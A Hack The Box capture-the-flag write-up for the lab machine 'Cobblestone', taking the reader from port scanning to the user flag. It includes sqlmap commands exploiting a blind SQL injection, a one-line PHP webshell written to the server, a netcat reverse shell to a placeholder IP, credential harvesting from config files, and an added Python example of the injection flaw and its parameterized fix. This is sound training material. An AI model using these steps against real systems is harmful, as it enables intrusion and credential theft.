Cobblestone - Hack The Box

Platform: Linux
IP: 10.10.11.81
Difficulty: Insane
Author: NoSec



Editing the hosts file

Add the Cobblestone domains so the vhosts resolve.

sudo nano /etc/hosts
10.10.11.81 cobblestone.htb vote.cobblestone.htb

Recon – Service enumeration

Nmap port scan

Two open ports: web + SSH.

nmap -sVC cobblestone.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-17 12:02 CEST
Nmap scan report for 10.10.11.81
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 50:ef:5f:db:82:03:36:51:27:6c:6b:a6:fc:3f:5a:9f (ECDSA)
|_  256 e2:1d:f3:e9:6a:ce:fb:e0:13:9b:07:91:28:38:ec:5d (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://cobblestone.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

Vhosts / surface

  • cobblestone.htb – main site (skin uploader; sandbox vibes)
  • vote.cobblestone.htb – “submit a URL to vote” (server-side fetch)

Bug ID — Blind SQLi @ vote.cobblestone.htb

On vote.cobblestone.htb, the URL field is processed server-side. Flipping the payload between a true and a false condition changes the response, which means boolean-based blind SQLi (BSQLi).

http://x'+AND+'1'='1   # ok
http://x'+AND+'1'='2   # different response

Capture the POST with Burp, save as vote.req.
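Why the two probes above get different responses, and what the fix looks like, as an added example (not code from the box or from this write-up). It assumes a hypothetical `votes` table with a `url` column, a constructed row for `http://x`, and SQLite standing in for the real database engine.

```python
import sqlite3

# Constructed sample data: table and column names are hypothetical, and
# SQLite stands in for the box's real database engine.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE votes (id INTEGER PRIMARY KEY, url TEXT)")
    db.execute("INSERT INTO votes (url) VALUES ('http://x')")
    return db

def lookup_vulnerable(db, url):
    # User input is concatenated into the SQL text, so a quote inside
    # `url` closes the string literal and the rest is parsed as SQL.
    sql = "SELECT id FROM votes WHERE url = '" + url + "'"
    return db.execute(sql).fetchone() is not None

def lookup_hardened(db, url):
    # Placeholder binding: the driver passes `url` as data only, so the
    # quote and the trailing condition stay part of the compared string.
    row = db.execute("SELECT id FROM votes WHERE url = ?", (url,)).fetchone()
    return row is not None

def compare(db):
    # The two probe values from the write-up, after URL decoding ('+' -> space).
    probes = ["http://x' AND '1'='1", "http://x' AND '1'='2"]
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p)) for p in probes}

if __name__ == "__main__":
    for probe, (vuln, hard) in compare(make_db()).items():
        print(f"{probe!r}: vulnerable={vuln} hardened={hard}")
```

With concatenation the answer follows the injected condition; with a bound parameter both probes are just unknown URLs and the response no longer leaks a boolean.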


Weaponize with sqlmap

Enumerate, then abuse --file-write to drop a webshell inside the Vote vhost (the main site is jailed; this isn’t).

# enumerate
sqlmap -r vote.req -p url --level 5 --risk 3 --batch --threads 5

# (optional) dump what you need
sqlmap -r vote.req --batch -D vote --dump-all

# drop shell into the vote app root
sqlmap -r vote.req --batch \
  --file-write=./shell.php \
  --file-dest=/var/www/vote/shell.php

shell.php:

<?php system($_REQUEST['cmd'] ?? 'id');

Shell —> www-data

Start a listener:

nc -lvnp 4444

Trigger reverse:

curl -s http://vote.cobblestone.htb/shell.php \
  --data-urlencode 'cmd=busybox nc YOUR_IP 4444 -e /bin/bash'

Now you’re www-data in the Vote context (no jail).


Creds loot → SSH user

Hunt configs and DB creds from the app:

# common stash
ls -la /var/www/vote
grep -R "pass\|user\|dsn" -n /var/www/vote 2>/dev/null | head

# if DB creds found, dump users
mysql -u DBUSER -p'DBPASS' -h 127.0.0.1 vote -e 'select * from users;'

Try the recovered password for the `cobble` user via SSH:

ssh cobble@cobblestone.htb

If you hit a restricted shell (rbash), it’s fine — you only need the flag.


User flag

cat ~/user.txt

User flag obtained!


🔐 The root part drops later in the private Telegram group while the box is active.
📡 t.me/nosecpwn

